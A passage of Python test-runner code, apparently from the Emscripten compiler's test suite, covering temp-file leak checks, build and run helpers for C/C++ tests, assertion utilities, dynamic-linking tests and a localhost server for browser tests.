self.temp_files_before_run.append(os.path.normpath(os.path.join(root, filename)))
self.banned_js_engines = []
self.use_all_engines = EMTEST_ALL_ENGINES
if self.save_dir:
self.working_dir = os.path.join(self.temp_dir, 'emscripten_test')
ensure_dir(self.working_dir)
else:
self.working_dir = tempfile.mkdtemp(prefix='emscripten_test_' + self.__class__.__name__ + '_', dir=self.temp_dir)
os.chdir(self.working_dir)
if not self.save_dir:
self.has_prev_ll = False
for temp_file in os.listdir(TEMP_DIR):
if temp_file.endswith('.ll'):
self.has_prev_ll = True
def tearDown(self):
if not self.save_dir:
# rmtree() fails on Windows if the current working directory is inside the tree.
os.chdir(os.path.dirname(self.get_dir()))
try_delete(self.get_dir())
if EMTEST_DETECT_TEMPFILE_LEAKS and not os.environ.get('EMCC_DEBUG'):
temp_files_after_run = []
for root, dirnames, filenames in os.walk(self.temp_dir):
for dirname in dirnames:
temp_files_after_run.append(os.path.normpath(os.path.join(root, dirname)))
for filename in filenames:
temp_files_after_run.append(os.path.normpath(os.path.join(root, filename)))
# Our leak detection will pick up *any* new temp files in the temp dir. They may not be due to
# us, but e.g. the browser when running browser tests. Until we figure out a proper solution,
# ignore some temp file names that we see on our CI infrastructure.
ignorable_file_prefixes = [
'/tmp/tmpaddon',
'/tmp/circleci-no-output-timeout',
'/tmp/wasmer'
]
left_over_files = set(temp_files_after_run) - set(self.temp_files_before_run)
left_over_files = [f for f in left_over_files if not any([f.startswith(prefix) for prefix in ignorable_file_prefixes])]
if len(left_over_files):
print('ERROR: After running test, there are ' + str(len(left_over_files)) + ' new temporary files/directories left behind:', file=sys.stderr)
for f in left_over_files:
print('leaked file: ' + f, file=sys.stderr)
self.fail('Test leaked ' + str(len(left_over_files)) + ' temporary files!')
# Make sure we don't leave stuff around
# if not self.has_prev_ll:
# for temp_file in os.listdir(TEMP_DIR):
# assert not temp_file.endswith('.ll'), temp_file
# # TODO assert not temp_file.startswith('emscripten_'), temp_file
def get_setting(self, key):
if key in self.settings_mods:
return self.settings_mods[key]
return Settings[key]
def set_setting(self, key, value=1):
if value is None:
self.clear_setting(key)
self.settings_mods[key] = value
def has_changed_setting(self, key):
return key in self.settings_mods
def clear_setting(self, key):
self.settings_mods.pop(key, None)
def serialize_settings(self):
ret = []
for key, value in self.settings_mods.items():
if value == 1:
ret += ['-s', key]
else:
ret += ['-s', '{}={}'.format(key, json.dumps(value))]
return ret
def get_dir(self):
return self.working_dir
def in_dir(self, *pathelems):
return os.path.join(self.get_dir(), *pathelems)
def get_stdout_path(self):
return os.path.join(self.get_dir(), 'stdout')
def prep_ll_file(self, output_file, input_file, force_recompile=False, build_ll_hook=None):
# force_recompile = force_recompile or os.path.getsize(filename + '.ll') > 50000
# If the file is big, recompile just to get ll_opts
# Recompiling just for dfe in ll_opts is too costly
def fix_target(ll_filename):
if LLVM_TARGET == ASM_JS_TARGET:
return
with open(ll_filename) as f:
contents = f.read()
if LLVM_TARGET in contents:
return
asmjs_layout = "e-p:32:32-i64:64-v128:32:128-n32-S128"
wasm_layout = "e-m:e-p:32:32-i64:64-n32:64-S128"
assert(ASM_JS_TARGET in contents)
assert(asmjs_layout in contents)
contents = contents.replace(asmjs_layout, wasm_layout)
contents = contents.replace(ASM_JS_TARGET, WASM_TARGET)
with open(ll_filename, 'w') as f:
f.write(contents)
output_obj = output_file + '.o'
output_ll = output_file + '.ll'
if force_recompile or build_ll_hook:
if input_file.endswith(('.bc', '.o')):
if input_file != output_obj:
shutil.copy(input_file, output_obj)
Building.llvm_dis(output_obj, output_ll)
else:
shutil.copy(input_file, output_ll)
fix_target(output_ll)
if build_ll_hook:
need_post = build_ll_hook(output_file)
Building.llvm_as(output_ll, output_obj)
shutil.move(output_ll, output_ll + '.pre') # for comparisons later
Building.llvm_dis(output_obj, output_ll)
if build_ll_hook and need_post:
build_ll_hook(output_file)
Building.llvm_as(output_ll, output_obj)
shutil.move(output_ll, output_ll + '.post') # for comparisons later
Building.llvm_dis(output_obj, output_ll)
Building.llvm_as(output_ll, output_obj)
else:
if input_file.endswith('.ll'):
safe_copy(input_file, output_ll)
fix_target(output_ll)
Building.llvm_as(output_ll, output_obj)
else:
safe_copy(input_file, output_obj)
return output_obj
# returns the full list of arguments to pass to emcc
# param @main_file whether this is the main file of the test. some arguments
# (like --pre-js) do not need to be passed when building
# libraries, for example
def get_emcc_args(self, main_file=False):
args = self.serialize_settings() + self.emcc_args
if not main_file:
for i, arg in enumerate(args):
if arg in ('--pre-js', '--post-js'):
args[i] = None
args[i + 1] = None
args = [arg for arg in args if arg is not None]
return args
# Build JavaScript code from source code
def build(self, src, dirname, filename, main_file=None,
additional_files=[], libraries=[], includes=[], build_ll_hook=None,
post_build=None, js_outfile=True):
# Copy over necessary files for compiling the source
if main_file is None:
with open(filename, 'w') as f:
f.write(src)
final_additional_files = []
for f in additional_files:
final_additional_files.append(os.path.join(dirname, os.path.basename(f)))
shutil.copyfile(f, final_additional_files[-1])
additional_files = final_additional_files
else:
# copy whole directory, and use a specific main .cpp file
# (rmtree() fails on Windows if the current working directory is inside the tree.)
if os.getcwd().startswith(os.path.abspath(dirname)):
os.chdir(os.path.join(dirname, '..'))
shutil.rmtree(dirname)
shutil.copytree(src, dirname)
shutil.move(os.path.join(dirname, main_file), filename)
# the additional files were copied; alter additional_files to point to their full paths now
additional_files = [os.path.join(dirname, f) for f in additional_files]
os.chdir(self.get_dir())
suffix = '.o.js' if js_outfile else '.o.wasm'
all_sources = [filename] + additional_files
if any(os.path.splitext(s)[1] in ('.cc', '.cxx', '.cpp') for s in all_sources):
compiler = EMXX
else:
compiler = EMCC
if build_ll_hook:
# "slow", old path: build to bc, then build to JS
# C++ => LLVM binary
for f in all_sources:
try:
# Make sure we notice if compilation steps failed
os.remove(f + '.o')
except OSError:
pass
args = [PYTHON, compiler] + self.get_emcc_args(main_file=True) + \
['-I' + dirname, '-I' + os.path.join(dirname, 'include')] + \
['-I' + include for include in includes] + \
['-c', f, '-o', f + '.o']
run_process(args, stderr=self.stderr_redirect if not DEBUG else None)
self.assertExists(f + '.o')
# Link all files
object_file = filename + '.o'
if len(additional_files) + len(libraries):
shutil.move(object_file, object_file + '.alone')
inputs = [object_file + '.alone'] + [f + '.o' for f in additional_files] + libraries
Building.link_to_object(inputs, object_file)
if not os.path.exists(object_file):
print("Failed to link LLVM binaries:\n\n", object_file)
self.fail("Linkage error")
# Finalize
self.prep_ll_file(filename, object_file, build_ll_hook=build_ll_hook)
# BC => JS
Building.emcc(object_file, self.get_emcc_args(main_file=True), object_file + '.js')
else:
# "fast", new path: just call emcc and go straight to JS
all_files = all_sources + libraries
for i in range(len(all_files)):
if '.' not in all_files[i]:
shutil.move(all_files[i], all_files[i] + '.bc')
all_files[i] += '.bc'
args = [PYTHON, compiler] + self.get_emcc_args(main_file=True) + \
['-I' + dirname, '-I' + os.path.join(dirname, 'include')] + \
['-I' + include for include in includes] + \
all_files + ['-o', filename + suffix]
run_process(args, stderr=self.stderr_redirect if not DEBUG else None)
self.assertExists(filename + suffix)
if post_build:
post_build(filename + suffix)
if js_outfile and self.uses_memory_init_file():
src = open(filename + suffix).read()
# side memory init file, or an empty one in the js
assert ('/* memory initializer */' not in src) or ('/* memory initializer */ allocate([]' in src)
def validate_asmjs(self, err):
m = re.search(r"asm.js type error: '(\w+)' is not a (standard|supported) SIMD type", err)
if m:
# Bug numbers for missing SIMD types:
bugs = {
'Int8x16': 1136226,
'Int16x8': 1136226,
'Uint8x16': 1244117,
'Uint16x8': 1244117,
'Uint32x4': 1240796,
'Float64x2': 1124205,
}
simd = m.group(1)
if simd in bugs:
print(("\nWARNING: ignoring asm.js type error from {} due to implementation not yet available in SpiderMonkey." +
" See https://bugzilla.mozilla.org/show_bug.cgi?id={}\n").format(simd, bugs[simd]), file=sys.stderr)
err = err.replace(m.group(0), '')
# check for asm.js validation
if 'uccessfully compiled asm.js code' in err and 'asm.js link error' not in err:
print("[was asm.js'ified]", file=sys.stderr)
# check for an asm.js validation error, if we expect one
elif 'asm.js' in err and not self.is_wasm() and self.get_setting('ASM_JS') == 1:
self.fail("did NOT asm.js'ify: " + err)
err = '\n'.join([line for line in err.split('\n') if 'uccessfully compiled asm.js code' not in line])
return err
def get_func(self, src, name):
start = src.index('function ' + name + '(')
t = start
n = 0
while True:
if src[t] == '{':
n += 1
elif src[t] == '}':
n -= 1
if n == 0:
return src[start:t + 1]
t += 1
assert t < len(src)
def count_funcs(self, javascript_file):
num_funcs = 0
start_tok = "// EMSCRIPTEN_START_FUNCS"
end_tok = "// EMSCRIPTEN_END_FUNCS"
start_off = 0
end_off = 0
with open(javascript_file, 'rt') as f:
blob = "".join(f.readlines())
start_off = blob.find(start_tok) + len(start_tok)
end_off = blob.find(end_tok)
asm_chunk = blob[start_off:end_off]
num_funcs = asm_chunk.count('function ')
return num_funcs
def count_wasm_contents(self, wasm_binary, what):
out = run_process([os.path.join(Building.get_binaryen_bin(), 'wasm-opt'), wasm_binary, '--metrics'], stdout=PIPE).stdout
# output is something like
# [?] : 125
for line in out.splitlines():
if '[' + what + ']' in line:
ret = line.split(':')[1].strip()
return int(ret)
self.fail('Failed to find [%s] in wasm-opt output' % what)
def get_wasm_text(self, wasm_binary):
return run_process([os.path.join(Building.get_binaryen_bin(), 'wasm-dis'), wasm_binary], stdout=PIPE).stdout
def is_exported_in_wasm(self, name, wasm):
wat = self.get_wasm_text(wasm)
return ('(export "%s"' % name) in wat
def run_generated_code(self, engine, filename, args=[], check_timeout=True, output_nicerizer=None, assert_returncode=0):
# use files, as PIPE can get too full and hang us
stdout = self.in_dir('stdout')
stderr = self.in_dir('stderr')
# Make sure that we produced proper line endings to the .js file we are about to run.
self.assertEqual(line_endings.check_line_endings(filename), 0)
error = None
if EMTEST_VERBOSE:
print("Running '%s' under '%s'" % (filename, engine))
try:
with chdir(self.get_dir()):
jsrun.run_js(filename, engine, args, check_timeout,
stdout=open(stdout, 'w'),
stderr=open(stderr, 'w'),
assert_returncode=assert_returncode)
except subprocess.CalledProcessError as e:
error = e
out = open(stdout, 'r').read()
err = open(stderr, 'r').read()
if engine == SPIDERMONKEY_ENGINE and self.get_setting('ASM_JS') == 1:
err = self.validate_asmjs(err)
if output_nicerizer:
ret = output_nicerizer(out, err)
else:
ret = out + err
if error or EMTEST_VERBOSE:
print('-- begin program output --')
print(ret, end='')
print('-- end program output --')
if error:
self.fail('JS subprocess failed (%s): %s. Output:\n%s' % (error.cmd, error.returncode, ret))
# We should pass all strict mode checks
self.assertNotContained('strict warning:', ret)
return ret
def assertExists(self, filename, msg=None):
if not msg:
msg = 'Expected file not found: ' + filename
self.assertTrue(os.path.exists(filename), msg)
def assertNotExists(self, filename, msg=None):
if not msg:
msg = 'Unexpected file exists: ' + filename
self.assertFalse(os.path.exists(filename), msg)
# Tests that the given two paths are identical, modulo path delimiters. E.g. "C:/foo" is equal to "C:\foo".
def assertPathsIdentical(self, path1, path2):
path1 = path1.replace('\\', '/')
path2 = path2.replace('\\', '/')
return self.assertIdentical(path1, path2)
# Tests that the given two multiline text content are identical, modulo line
# ending differences (\r\n on Windows, \n on Unix).
def assertTextDataIdentical(self, text1, text2, msg=None,
fromfile='expected', tofile='actual'):
text1 = text1.replace('\r\n', '\n')
text2 = text2.replace('\r\n', '\n')
return self.assertIdentical(text1, text2, msg, fromfile, tofile)
def assertIdentical(self, values, y, msg=None,
fromfile='expected', tofile='actual'):
if type(values) not in (list, tuple):
values = [values]
for x in values:
if x == y:
return # success
diff_lines = difflib.unified_diff(x.splitlines(), y.splitlines(),
fromfile=fromfile, tofile=tofile)
diff = ''.join([a.rstrip() + '\n' for a in diff_lines])
if EMTEST_VERBOSE:
print("Expected to have '%s' == '%s'" % limit_size(values[0]), limit_size(y))
fail_message = 'Unexpected difference:\n' + limit_size(diff)
if not EMTEST_VERBOSE:
fail_message += '\nFor full output run with EMTEST_VERBOSE=1.'
if msg:
fail_message += '\n' + msg
self.fail(fail_message)
def assertTextDataContained(self, text1, text2):
text1 = text1.replace('\r\n', '\n')
text2 = text2.replace('\r\n', '\n')
return self.assertContained(text1, text2)
def assertContained(self, values, string, additional_info=''):
if type(values) not in [list, tuple]:
values = [values]
values = list(map(asstr, values))
if callable(string):
string = string()
if not any(v in string for v in values):
diff = difflib.unified_diff(values[0].split('\n'), string.split('\n'), fromfile='expected', tofile='actual')
diff = ''.join(a.rstrip() + '\n' for a in diff)
self.fail("Expected to find '%s' in '%s', diff:\n\n%s\n%s" % (
limit_size(values[0]), limit_size(string), limit_size(diff),
additional_info
))
def assertNotContained(self, value, string):
if callable(value):
value = value() # lazy loading
if callable(string):
string = string()
if value in string:
self.fail("Expected to NOT find '%s' in '%s', diff:\n\n%s" % (
limit_size(value), limit_size(string),
limit_size(''.join([a.rstrip() + '\n' for a in difflib.unified_diff(value.split('\n'), string.split('\n'), fromfile='expected', tofile='actual')]))
))
def assertContainedIf(self, value, string, condition):
if condition:
self.assertContained(value, string)
else:
self.assertNotContained(value, string)
def assertBinaryEqual(self, file1, file2):
self.assertEqual(os.path.getsize(file1),
os.path.getsize(file2))
self.assertEqual(open(file1, 'rb').read(),
open(file2, 'rb').read())
library_cache = {}
def get_build_dir(self):
ret = os.path.join(self.get_dir(), 'building')
ensure_dir(ret)
return ret
def get_library(self, name, generated_libs, configure=['sh', './configure'],
configure_args=[], make=['make'], make_args=None,
env_init={}, cache_name_extra='', native=False):
if make_args is None:
make_args = ['-j', str(multiprocessing.cpu_count())]
build_dir = self.get_build_dir()
output_dir = self.get_dir()
emcc_args = self.get_emcc_args()
hash_input = (str(emcc_args) + ' $ ' + str(env_init)).encode('utf-8')
cache_name = name + ','.join([opt for opt in emcc_args if len(opt) < 7]) + '_' + hashlib.md5(hash_input).hexdigest() + cache_name_extra
valid_chars = "_%s%s" % (string.ascii_letters, string.digits)
cache_name = ''.join([(c if c in valid_chars else '_') for c in cache_name])
if self.library_cache.get(cache_name):
print('<load %s from cache> ' % cache_name, file=sys.stderr)
generated_libs = []
for basename, contents in self.library_cache[cache_name]:
bc_file = os.path.join(build_dir, cache_name + '_' + basename)
with open(bc_file, 'wb') as f:
f.write(contents)
generated_libs.append(bc_file)
return generated_libs
print('<building and saving %s into cache> ' % cache_name, file=sys.stderr)
return build_library(name, build_dir, output_dir, generated_libs, configure,
configure_args, make, make_args, self.library_cache,
cache_name, env_init=env_init, native=native, cflags=self.get_emcc_args())
def clear(self):
for name in os.listdir(self.get_dir()):
try_delete(os.path.join(self.get_dir(), name))
if EMSCRIPTEN_TEMP_DIR:
for name in os.listdir(EMSCRIPTEN_TEMP_DIR):
try_delete(os.path.join(EMSCRIPTEN_TEMP_DIR, name))
# Shared test code between main suite and others
def expect_fail(self, cmd, **args):
"""Run a subprocess and assert that it returns non-zero.
Return the stderr of the subprocess.
"""
proc = run_process(cmd, check=False, stderr=PIPE, **args)
self.assertNotEqual(proc.returncode, 0, 'subprocess unexpectedly succeeded. stderr:\n' + proc.stderr)
# When we check for failure we expect a user-visible error, not a traceback.
# However, on windows a python traceback can happen randomly sometimes,
# due to "Access is denied" https://github.com/emscripten-core/emscripten/issues/718
if not WINDOWS or 'Access is denied' not in proc.stderr:
self.assertNotContained('Traceback', proc.stderr)
return proc.stderr
def setup_runtimelink_test(self):
create_test_file('header.h', r'''
struct point
{
int x, y;
};
''')
supp = r'''
#include <stdio.h>
#include "header.h"
extern void mainFunc(int x);
extern int mainInt;
void suppFunc(struct point &p) {
printf("supp: %d,%d\n", p.x, p.y);
mainFunc(p.x + p.y);
printf("supp see: %d\n", mainInt);
}
int suppInt = 76;
'''
create_test_file('supp.cpp', supp)
main = r'''
#include <stdio.h>
#include "header.h"
extern void suppFunc(struct point &p);
extern int suppInt;
void mainFunc(int x) {
printf("main: %d\n", x);
}
int mainInt = 543;
int main( int argc, const char *argv[] ) {
struct point p = { 54, 2 };
suppFunc(p);
printf("main see: %d\nok.\n", suppInt);
#ifdef BROWSER
REPORT_RESULT(suppInt);
#endif
return 0;
}
'''
return (main, supp)
# excercise dynamic linker.
#
# test that linking to shared library B, which is linked to A, loads A as well.
# main is also linked to C, which is also linked to A. A is loaded/initialized only once.
#
# B
# main < > A
# C
#
# this test is used by both test_core and test_browser.
# when run under broswer it excercises how dynamic linker handles concurrency
# - because B and C are loaded in parallel.
def _test_dylink_dso_needed(self, do_run):
create_test_file('liba.cpp', r'''
#include <stdio.h>
#include <emscripten.h>
static const char *afunc_prev;
extern "C" {
EMSCRIPTEN_KEEPALIVE void afunc(const char *s);
}
void afunc(const char *s) {
printf("a: %s (prev: %s)\n", s, afunc_prev);
afunc_prev = s;
}
struct ainit {
ainit() {
puts("a: loaded");
}
};
static ainit _;
''')
create_test_file('libb.cpp', r'''
#include <emscripten.h>
extern "C" {
void afunc(const char *s);
EMSCRIPTEN_KEEPALIVE void bfunc();
}
void bfunc() {
afunc("b");
}
''')
create_test_file('libc.cpp', r'''
#include <emscripten.h>
extern "C" {
void afunc(const char *s);
EMSCRIPTEN_KEEPALIVE void cfunc();
}
void cfunc() {
afunc("c");
}
''')
# _test_dylink_dso_needed can be potentially called several times by a test.
# reset dylink-related options first.
self.clear_setting('MAIN_MODULE')
self.clear_setting('SIDE_MODULE')
self.clear_setting('RUNTIME_LINKED_LIBS')
# XXX in wasm each lib load currently takes 5MB; default INITIAL_MEMORY=16MB is thus not enough
self.set_setting('INITIAL_MEMORY', 32 * 1024 * 1024)
so = '.wasm' if self.is_wasm() else '.js'
def ccshared(src, linkto=[]):
cmdv = [PYTHON, EMCC, src, '-o', os.path.splitext(src)[0] + so] + self.get_emcc_args()
cmdv += ['-s', 'SIDE_MODULE=1', '-s', 'RUNTIME_LINKED_LIBS=' + str(linkto)]
run_process(cmdv)
ccshared('liba.cpp')
ccshared('libb.cpp', ['liba' + so])
ccshared('libc.cpp', ['liba' + so])
self.set_setting('MAIN_MODULE', 1)
self.set_setting('RUNTIME_LINKED_LIBS', ['libb' + so, 'libc' + so])
do_run(r'''
extern "C" {
void bfunc();
void cfunc();
}
int test_main() {
bfunc();
cfunc();
return 0;
}
''',
'a: loaded\na: b (prev: (null))\na: c (prev: b)\n')
self.set_setting('RUNTIME_LINKED_LIBS', [])
for libname in ['liba', 'libb', 'libc']:
self.emcc_args += ['--embed-file', libname + so]
do_run(r'''
#include <assert.h>
#include <dlfcn.h>
#include <stddef.h>
int test_main() {
void *bdso, *cdso;
void (*bfunc)(), (*cfunc)();
// FIXME for RTLD_LOCAL binding symbols to loaded lib is not currently working
bdso = dlopen("libb%(so)s", RTLD_GLOBAL);
assert(bdso != NULL);
cdso = dlopen("libc%(so)s", RTLD_GLOBAL);
assert(cdso != NULL);
bfunc = (void (*)())dlsym(bdso, "bfunc");
assert(bfunc != NULL);
cfunc = (void (*)())dlsym(cdso, "cfunc");
assert(cfunc != NULL);
bfunc();
cfunc();
return 0;
}
''' % locals(),
'a: loaded\na: b (prev: (null))\na: c (prev: b)\n')
def filtered_js_engines(self, js_engines=None):
if js_engines is None:
js_engines = shared.JS_ENGINES
for engine in js_engines:
assert type(engine) == list
for engine in self.banned_js_engines:
assert type(engine) in (list, type(None))
banned = [b[0] for b in self.banned_js_engines if b]
return [engine for engine in js_engines if engine and engine[0] not in banned]
def do_run_from_file(self, src, expected_output, *args, **kwargs):
if 'force_c' not in kwargs and os.path.splitext(src)[1] == '.c':
kwargs['force_c'] = True
logger.debug('do_run_from_file: %s' % src)
self.do_run(open(src).read(), open(expected_output).read(), *args, **kwargs)
def do_run_in_out_file_test(self, *path, **kwargs):
test_path = path_from_root(*path)
def find_files(*ext_list):
ret = None
count = 0
for ext in ext_list:
if os.path.isfile(test_path + ext):
ret = test_path + ext
count += 1
assert count > 0, ("No file found at {} with extension {}"
.format(test_path, ext_list))
assert count <= 1, ("Test file {} found with multiple valid extensions {}"
.format(test_path, ext_list))
return ret
src = find_files('.c', '.cpp')
output = find_files('.out', '.txt')
self.do_run_from_file(src, output, **kwargs)
## Does a complete test - builds, runs, checks output, etc.
def do_run(self, src, expected_output, args=[], output_nicerizer=None,
no_build=False, main_file=None, additional_files=[],
js_engines=None, post_build=None, basename='src.cpp', libraries=[],
includes=[], force_c=False, build_ll_hook=None,
assert_returncode=0, assert_identical=False, assert_all=False,
check_for_error=True):
if force_c or (main_file is not None and main_file[-2:]) == '.c':
basename = 'src.c'
if no_build:
if src:
js_file = src
else:
js_file = basename + '.o.js'
else:
dirname = self.get_dir()
filename = os.path.join(dirname, basename)
self.build(src, dirname, filename, main_file=main_file,
additional_files=additional_files, libraries=libraries,
includes=includes,
build_ll_hook=build_ll_hook, post_build=post_build)
js_file = filename + '.o.js'
self.assertExists(js_file)
# Run in both JavaScript engines, if optimizing - significant differences there (typed arrays)
js_engines = self.filtered_js_engines(js_engines)
# Make sure to get asm.js validation checks, using sm, even if not testing all vms.
if len(js_engines) > 1 and not self.use_all_engines:
if SPIDERMONKEY_ENGINE in js_engines and not self.is_wasm_backend():
js_engines = [SPIDERMONKEY_ENGINE]
else:
js_engines = js_engines[:1]
# In standalone mode, also add wasm vms as we should be able to run there too.
if self.get_setting('STANDALONE_WASM'):
# TODO once standalone wasm support is more stable, apply use_all_engines
# like with js engines, but for now as we bring it up, test in all of them
wasm_engines = shared.WASM_ENGINES
if len(wasm_engines) == 0:
logger.warning('no wasm engine was found to run the standalone part of this test')
js_engines += wasm_engines
if len(js_engines) == 0:
self.skipTest('No JS engine present to run this test with. Check %s and the paths therein.' % EM_CONFIG)
for engine in js_engines:
js_output = self.run_generated_code(engine, js_file, args, output_nicerizer=output_nicerizer, assert_returncode=assert_returncode)
js_output = js_output.replace('\r\n', '\n')
if expected_output:
try:
if assert_identical:
self.assertIdentical(expected_output, js_output)
elif assert_all:
for o in expected_output:
self.assertContained(o, js_output)
else:
self.assertContained(expected_output, js_output)
if check_for_error:
self.assertNotContained('ERROR', js_output)
except Exception:
print('(test did not pass in JS engine: %s)' % engine)
raise
def get_freetype_library(self):
if '-Werror' in self.emcc_args:
self.emcc_args.remove('-Werror')
return self.get_library(os.path.join('third_party', 'freetype'), os.path.join('objs', '.libs', 'libfreetype.a'), configure_args=['--disable-shared', '--without-zlib'])
def get_poppler_library(self, env_init=None):
# The fontconfig symbols are all missing from the poppler build
# e.g. FcConfigSubstitute
self.set_setting('ERROR_ON_UNDEFINED_SYMBOLS', 0)
self.emcc_args += [
'-I' + path_from_root('tests', 'third_party', 'freetype', 'include'),
'-I' + path_from_root('tests', 'third_party', 'poppler', 'include')
]
freetype = self.get_freetype_library()
# Poppler has some pretty glaring warning. Suppress them to keep the
# test output readable.
if '-Werror' in self.emcc_args:
self.emcc_args.remove('-Werror')
self.emcc_args += [
'-Wno-sentinel',
'-Wno-logical-not-parentheses',
'-Wno-unused-private-field',
'-Wno-tautological-compare',
'-Wno-unknown-pragmas',
]
env_init = env_init.copy() if env_init else {}
env_init['FONTCONFIG_CFLAGS'] = ' '
env_init['FONTCONFIG_LIBS'] = ' '
poppler = self.get_library(
os.path.join('third_party', 'poppler'),
[os.path.join('utils', 'pdftoppm.o'), os.path.join('utils', 'parseargs.o'), os.path.join('poppler', '.libs', 'libpoppler.a')],
env_init=env_init,
configure_args=['--disable-libjpeg', '--disable-libpng', '--disable-poppler-qt', '--disable-poppler-qt4', '--disable-cms', '--disable-cairo-output', '--disable-abiword-output', '--disable-shared'])
return poppler + freetype
def get_zlib_library(self):
if WINDOWS:
return self.get_library(os.path.join('third_party', 'zlib'), os.path.join('libz.a'),
configure=[path_from_root('emconfigure.bat')],
configure_args=['cmake', '.'],
make=['mingw32-make'],
make_args=[])
return self.get_library(os.path.join('third_party', 'zlib'), os.path.join('libz.a'), make_args=['libz.a'])
# Run a server and a web page. When a test runs, we tell the server about it,
# which tells the web page, which then opens a window with the test. Doing
# it this way then allows the page to close() itself when done.
def harness_server_func(in_queue, out_queue, port):
class TestServerHandler(SimpleHTTPRequestHandler):
# Request header handler for default do_GET() path in
# SimpleHTTPRequestHandler.do_GET(self) below.
def send_head(self):
if self.path.endswith('.js'):
path = self.translate_path(self.path)
try:
f = open(path, 'rb')
except IOError:
self.send_error(404, "File not found: " + path)
return None
self.send_response(200)
self.send_header('Content-type', 'application/javascript')
self.send_header('Connection', 'close')
self.end_headers()
return f
else:
return SimpleHTTPRequestHandler.send_head(self)
# Add COOP, COEP, CORP, and no-caching headers
def end_headers(self):
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Cross-Origin-Opener-Policy', 'same-origin')
self.send_header('Cross-Origin-Embedder-Policy', 'require-corp')
self.send_header('Cross-Origin-Resource-Policy', 'cross-origin')
self.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
return SimpleHTTPRequestHandler.end_headers(self)
def do_GET(self):
if self.path == '/run_harness':
if DEBUG:
print('[server startup]')
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write(open(path_from_root('tests', 'browser_harness.html'), 'rb').read())
elif 'report_' in self.path:
# the test is reporting its result. first change dir away from the
# test dir, as it will be deleted now that the test is finishing, and
# if we got a ping at that time, we'd return an error
os.chdir(path_from_root())
# for debugging, tests may encode the result and their own url (window.location) as result|url
if '|' in self.path:
path, url = self.path.split('|', 1)
else:
path = self.path
url = '?'
if DEBUG:
print('[server response:', path, url, ']')
if out_queue.empty():
out_queue.put(path)
else:
# a badly-behaving test may send multiple xhrs with reported results; we just care
# about the first (if we queued the others, they might be read as responses for
# later tests, or maybe the test sends more than one in a racy manner).
# we place 'None' in the queue here so that the outside knows something went wrong
# (none is not a valid value otherwise; and we need the outside to know because if we
# raise an error in here, it is just swallowed in python's webserver code - we want
# the test to actually fail, which a webserver response can't do).
out_queue.put(None)
raise Exception('browser harness error, excessive response to server - test must be fixed! "%s"' % self.path)
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.send_header('Cache-Control', 'no-cache, must-revalidate')
self.send_header('Connection', 'close')
self.send_header('Expires', '-1')
self.end_headers()
self.wfile.write(b'OK')
elif 'stdout=' in self.path or 'stderr=' in self.path or 'exception=' in self.path:
'''
To get logging to the console from browser tests, add this to
print/printErr/the exception handler in src/shell.html:
var xhr = new XMLHttpRequest();
xhr.open('GET', encodeURI('http://localhost:8888?stdout=' + text));
xhr.send();
'''
print('[client logging:', unquote_plus(self.path), ']')
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
elif self.path == '/check':
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
if not in_queue.empty():
# there is a new test ready to be served
url, dir = in_queue.get()
if DEBUG:
print('[queue command:', url, dir, ']')
assert in_queue.empty(), 'should not be any blockage - one test runs at a time'
assert out_queue.empty(), 'the single response from the last test was read'
# tell the browser to load the test
self.wfile.write(b'COMMAND:' + url)
# move us to the right place to serve the files for the new test
os.chdir(dir)
else:
# the browser must keep polling
self.wfile.write(b'(wait)')
else:
# Use SimpleHTTPServer default file serving operation for GET.
if DEBUG:
print('[simple HTTP serving:', unquote_plus(self.path), ']')
SimpleHTTPRequestHandler.do_GET(self)
def log_request(code=0, size=0):
# don't log; too noisy
pass
# allows streaming compilation to work
SimpleHTTPRequestHandler.extensions_map['.wasm'] = 'application/wasm'
httpd = HTTPServer(('localhost', port), TestServerHandler)
httpd.serve_forever() # test runner will kill us
class BrowserCore(RunnerCore):
# note how many tests hang / do not send an output. if many of these
# happen, likely something is broken and it is best to abort the test
# suite early, as otherwise we will wait for the timeout on every
# single test (hundreds of minutes)
MAX_UNRESPONSIVE_TESTS = 10
unresponsive_tests = 0
def __init__(self, *args, **kwargs):
super(BrowserCore, self).__init__(*args, **kwargs)
@staticmethod
def browser_open(url):
if not EMTEST_BROWSER:
logger.info('Using default system browser')
webbrowser.open_new(url)
return
browser_args = shlex.split(EMTEST_BROWSER)
# If the given browser is a scalar, treat it like one of the possible types
# from https://docs.python.org/2/library/webbrowser.html
if len(browser_args) == 1:
try:
# This throws if the type of browser isn't available
webbrowser.get(browser_args[0]).open_new(url)
logger.info('Using Emscripten browser: %s', browser_args[0])
return
except webbrowser.Error:
# Ignore the exception and fallback to the custom command logic
pass
# Else assume the given browser is a specific program with additional
# parameters and delegate to that
logger.info('Using Emscripten browser: %s', str(browser_args))
subprocess.Popen(browser_args + [url])
@classmethod
def setUpClass(cls):
super(BrowserCore, cls).setUpClass()
cls.also_asmjs = int(os.getenv('EMTEST_BROWSER_ALSO_ASMJS', '0')) == 1
cls.port = int(os.getenv('EMTEST_BROWSER_PORT', '8888'))
if not has_browser():
return
cls.browser_timeout = 60
cls.harness_in_queue = multiprocessing.Queue()
cls.harness_out_queue = multiprocessing.Queue()
cls.harness_server = multiprocessing.Process(target=harness_server_func, args=(cls.harness_in_queue, cls.harness_out_queue, cls.port))
cls.harness_server.start()
print('[Browser harness server on process %d]' % cls.harness_server.pid)
cls.browser_open('http://localhost:%s/run_harness' % cls.port)
@classmethod
def tearDownClass(cls):
super(BrowserCore, cls).tearDownClass()
if not has_browser():
return
cls.harness_server.terminate()
print('[Browser harness server terminated]')
if WINDOWS:
# On Windows, shutil.rmtree() in tearDown() raises this exception if we do not wait a bit:
# WindowsError: [Error 32] The process cannot access the file because it is being used by another process.
time.sleep(0.1)
def assert_out_queue_empty(self, who):
if not self.harness_out_queue.empty():
while not self.harness_out_queue.empty():
self.harness_out_queue.get()
raise Exception('excessive responses from %s' % who)
# @param tries_left: how many more times to try this test, if it fails. browser tests have
# many more causes of flakiness (in particular, they do not run
# synchronously, so we have a timeout, which can be hit if the VM
# we run on stalls temporarily), so we let each test try more than
# once by default
def run_browser(self, html_file, message, expectedResult=None, timeout=None, tries_left=1):
if not has_browser():
return
if BrowserCore.unresponsive_tests >= BrowserCore.MAX_UNRESPONSIVE_TESTS:
